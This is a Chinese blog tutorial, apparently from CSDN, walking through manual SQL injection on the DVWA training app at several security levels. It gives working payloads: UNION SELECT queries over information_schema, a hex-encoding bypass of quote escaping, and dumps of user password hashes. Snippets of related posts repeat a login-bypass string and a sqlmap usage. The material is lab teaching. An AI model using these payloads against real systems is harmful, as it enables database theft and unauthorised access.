【渗透测试】SQL Injection

最新推荐文章于 2024-07-31 00:37:57 发布
最新推荐文章于 2024-07-31 00:37:57 发布
阅读量110 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/preserphy/article/details/80914739
本文介绍了SQL注入的概念及其危害,并详细阐述了手工注入的步骤及不同难度级别的注入方式,包括Low、Medium、High和Impossible级别的具体操作方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。

===================================================================

·手工注入(非盲注)的步骤:

 

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定显示的字段顺序

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.下载数据

===================================================================

 

·注入类型:

数字型: SELECT 列 FROM 表 WHERE 数字型列=值

 字符型: SELECT 列 FROM 表 WHERE 字符型列=’值’

 搜索型: SELECT * FROM 表 WHERE where 被搜索的列 like ‘%值%’

===================================================================

·Low级别:对来自客户端的参数id没有进行任何的检查与过滤

①判断是否存在注入,注入是字符型还是数字型

1

1'and'1'='2'

1'or'1234'='1234'

若成功则说明存在字符型注入

②猜解SQL查询语句中的字段数

1'or 1=1 order by 1#

1'or 1=1 order by 2#

……

查询到多少就是有多少个字段

也可以通过union select 1,2,3……来猜解字段数

③确定显示的字段顺序

1'union select 1,2,3……#

④获取当前的数据库

1'union select 1,database()#

⑤获取数据库中的表

1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

⑥获取表中的字段名

1′ union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

⑦下载数据

1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

·Medium级别:利用相关函数对特殊符号\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了限制,如下拉选择表单,希望以此来控制用户的输入

〇若使用了下拉选择表单,可以通过抓包改参数,提交恶意构造的查询参数

①判断是否存在注入,注入是字符型还是数字型

1 or 1=1#

若成功则说明存在数字型注入

②猜解SQL查询语句中的字段数

1 order by 1#

1 order by 2#

……

查询到数字几就说明有多少个字段数

③确定显示的字段顺序

1 union select 1,2#

④获取当前的数据库

1 union select 1,database()#

⑤获取数据库中的表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

⑥获取表中的字段名

1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

失败。因为单引号被转义了,可以利用16进制绕过,即将表名转为16进制数据

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #

⑦下载数据

1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

·High级别:在查询语句中进行了一定程度的限制,例如:在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果

〇通过#将查询语句中的限制注释掉即可:

1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

需要特别提到的是,High级别的查询提交页面与查询结果显示页面若不是同一个,也没有执行302跳转,则这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。

·Impossible级别:采用了相关技术,划清了代码与数据的界限,有效防御SQL注入,同时进行查询语句的相关限制,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入可进一步提高了安全性。

DVWA-SQL注入
HoYim
03-03 551
low 1.判断注入类型 输入1’and’1=1 输入1’and’1=’2 无结果 输入1or1=1 类似1or1234=1234 由此判断出为字符型注入 2.判断字段数 ORDER BY 1 表示 所select 的字段按第一个字段排序,当后面跟的数字超过字段数时,则显示错误 输入1order by 1 输入1order by 2 输入1order b...
SQL 注入
Amity111的博客
01-14 422
先查看一下dvwa低安全等级下SQL注入源码: <?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($...
DVWA-SQL注入(SQL Injection
qyy970525的博客
11-20 459
DVWA-SQL注入(SQL InjectionSQL Injection手工注入的思路Low漏洞利用判断是否存在注入,注入式字符型还是数字型猜解SQL查询语句中的字段数确定显示的字段顺序获取当前数据库获取数据库中的表获取表中的字段 SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的,SQL注入漏洞的危害是巨大的,常常会导致整个数据库被"脱裤",尽量如此,SQL注入仍是现在最常见的Web漏洞之
SQL万能密码:' or 1='1
热门推荐
IT界迷者Blog--
10-09 1万+
SQL万能密码:’ or 1='1 select name,pass from tbAdmin where name=‘admin’ and pass=123456’ 输入用户名:’ or 1=1 SQL变成下面这个样子: select name,pass from tbAdmin where name=’’ or 1=1’ and pass=123456’ 1=1’ 永远为真,所以就验...
常见sql注入语句和xss注入语句
小白博客
12-22 3310
1 and 1=1 或者1' and '1'='1 判断注入的类型 1 order by 1,2,3,4 数字类型为例;判断当前表存在多少个属性字段1' union select 1,table_name from information_schema.tables where table_schema=database()# 通过占位获取的数据库名 去MySQL的元数据表information_schema中查表名1' union select 1,c...
渗透测试SQL注入
最新发布
Zgnb173659的博客
07-31 989
SQL注入攻击是渗透测试者对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
【THM】SQL InjectionSQL注入)-初级渗透测试
追风少年亚索的博客
03-29 2382
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
渗透测试-SQL注入
weixin_53696027的博客
02-05 2871
sql注入是渗透测试重要的一部分,如果服务器存在sql注入漏洞将面临严重的威胁
Kali渗透测试之DVWA系列7——SQL InjectionSQL注入)
浅浅的博客
06-13 4022
目录 一、SQL注入 1SQL注入漏洞原理 2、SQL注入类型 3、SQL注入过程 二、实验环境 三、实验步骤 安全级别:LOW 安全等级:Medium 安全级别:High 安全级别:Impossible 一、SQL注入 1SQL注入漏洞原理 把SQL命令插入到Web表单提交、或输入域名、或页面提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。 2、S...
Advanced SQL Injection.ppt
10-27
SQL注入是一种常见的网络安全威胁,它利用不安全的数据库查询来获取、修改或删除数据库中的敏感信息。本讲座“Advanced SQL Injection...同时,对于渗透测试人员而言,掌握这些技能有助于发现并修复系统中的潜在漏洞。
pangolin sql injection tool
08-02
1. **多平台支持**:Pangolin不仅可以在Windows操作系统上运行,还支持Linux和Mac OS,这使得它成为跨平台的渗透测试利器。 2. **自动化检测**:Pangolin能够自动检测目标网站是否存在SQL注入漏洞,大大提高了测试...
渗透测试sqlmap工具注入-基于dvwa的sql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1272
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL注入笔记(二)
lalalalala~~
07-22 1985
SQL注入的基本过程
渗透测试】【漏洞记录】某平台触发img-src存储型XSS
preserphy的博客
12-19 2680
这是某个管理平台,不知道是平台的问题还是二次开发的问题,授权测试过程中发现了这个漏洞,很常见,但由于本人是第一次采取这种利用方式,所以记录一下。 =============================================================== 利用背景:发现了XSS,并且在删除处可以进行触发img标签及src属性,但是常见的获取cookie、弹窗等等测试用的关键词...
渗透测试】【DVWA】CSRF
preserphy的博客
08-07 1710
【CSRF】 全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。...
渗透测试】【Sqlmap】DVWA-SQL Injection(low)
preserphy的博客
07-05 432
①进入sqlmap目录,使用-u命令访问地址:python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#"发现跳转到302了,被重定向了,所以这样不行…又回到浏览器页面看了一下请求,发现里面有cookie,所以我们要把相应的cookie加上。②使用--cookie命令加...
渗透测试SQL Injection(Blind)
preserphy的博客
07-06 161
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。====================================================...
渗透测试】XSS
preserphy的博客
07-04 124
XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型XSS、反射型XSS、本地型XSS、DOM型XSS。=============...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值